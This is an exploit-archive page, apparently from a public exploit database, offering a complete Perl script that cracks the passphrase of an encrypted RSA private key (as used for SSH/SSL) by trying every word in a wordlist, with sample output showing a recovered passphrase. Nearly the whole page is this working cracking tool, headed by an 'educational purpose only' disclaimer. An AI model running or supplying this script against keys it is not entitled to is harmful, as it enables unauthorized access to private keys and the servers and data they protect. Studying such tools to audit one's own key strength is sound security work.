SSH / SSL RSA Private Key Passphrase Dictionary Enumerator Exploit
| EKU-ID: 7511 | CVE: | OSVDB-ID: |
| Author: Todor Donev | Published: 2018-04-10 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 7511 | CVE: | OSVDB-ID: |
| Author: Todor Donev | Published: 2018-04-10 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
#!/usr/bin/perl # # SSH/SSL RSA Private Key Passphrase dictionary enumerator # # Copyright 2018 (c) Todor Donev <todor.donev at gmail.com> # # [<A class=__cf_email__ href="/cdn-cgi/l/email-protection" data-cfemail="f4809b909b86b484959895909d8199">[email protected]</A>]$ ssh-keygen -t rsa -b 4096 -C "<A class=__cf_email__ href="/cdn-cgi/l/email-protection" data-cfemail="7f161119103f1a0b17161c1e1352171e1c141a0d51100d18">[email protected]</A>" # Generating public/private rsa key pair. # Enter file in which to save the key (/home/todor/.ssh/id_rsa): test_rsa.prv # Enter passphrase (empty for no passphrase): # Enter same passphrase again: # Your identification has been saved in test_rsa.prv. # Your public key has been saved in test_rsa.prv.pub. # The key fingerprint is: # --- SNIP --- <A class=__cf_email__ href="/cdn-cgi/l/email-protection" data-cfemail="98f1f6fef7d8fdecf0f1fbf9f4b5f0f9fbf3fdeab6f7eaff">[email protected]</A> # The key's randomart image is: # +--[ RSA 4096]----+ # --- SNIP --- # --- SNIP --- # --- SNIP --- # --- SNIP --- # --- SNIP --- # --- SNIP --- # --- SNIP --- # +-----------------+ # [<A class=__cf_email__ href="/cdn-cgi/l/email-protection" data-cfemail="e4908b808b96a494858885808d9189">[email protected]</A>]$ perl ssh-ssl-enum-privkey.pl test_rsa.prv wordlist.txt # [+] SSH/SSL RSA Private Key Passphrase dictionary enumerator # [*] ====== # [?] root != Passphrase # [?] toor != Passphrase # [?] r00t != Passphrase # [?] t00r != Passphrase # [?] admin != Passphrase # [?] nimda != Passphrase # [?] support != Passphrase # [?] devel != Passphrase # [?] oper != Passphrase # [?] operator != Passphrase # [?] hacker != Passphrase # [?] h4x0r != Passphrase # [?] noob != Passphrase # [?] n00b != Passphrase # [?] boon != Passphrase # [?] b00n != Passphrase # [*] ====== # [!] Author: Todor Donev <todor.donev at gmail.com> # [*] ====== # [*] Passphrase for test_rsa.prv is Ethical-Hacker-Bulgaria-2o18 # # # Disclaimer: # This or previous programs is for Educational # purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the # fact that Todor Donev is not liable for any # damages caused by direct or indirect use of the # information or functionality provided by these # programs. The author or any Internet provider # bears NO responsibility for content or misuse # of these programs or any derivatives thereof. # By using these programs you accept the fact # that any damage (dataloss, system crash, # system compromise, etc.) caused by the use # of these programs is not Todor Donev's # responsibility. # # Use them at your own risk! # # Requirements: # cpan install Crypt::PK::RSA use strict; use warnings; use Crypt::PK::RSA; my ($p, $w) = @ARGV; my $k = Crypt::PK::RSA->new; print "[+] SSH/SSL RSA Private Key Passphrase dictionary enumerator\n"; &banner and die "[!] Usage: perl $0 <PRIVATE RSA KEY> <WORDLIST>" if @ARGV != 2; my $iskey = do { open (PRIVKEY, " <$p") or die "[-] Error: $p $!"; <PRIVKEY> }; &banner and print "[-] Error: The choosen file is empty" and exit if (-z $p); &banner and print "[-] Error: The choosen file is not valid private RSA key\n" and exit if $iskey !~ /--BEGIN RSA PRIVATE KEY--/; open (WORDLIST, " <$w") or die "[-] Error: $w $!"; die "[-] Error: The wordlist is empty" if (-z $w); my @file = <WORDLIST>; print "[*] ======\n"; foreach my $c(@file) { chomp $c; if (! eval { $k->import_key($p, $c) }) { print "[?] $c != Passphrase\n"; } else{ &banner and die "[*] Passphrase for $p is $c\n"; } } close (WORDLIST); &banner and print "[-] Sorry, I could not find the passphrase or the private key is corrupted!\n" and exit; sub banner{ print "[*] ======\n"; print "[!] Author: Todor Donev <todor.donev at gmail.com>\n"; print "[*] ======\n"; }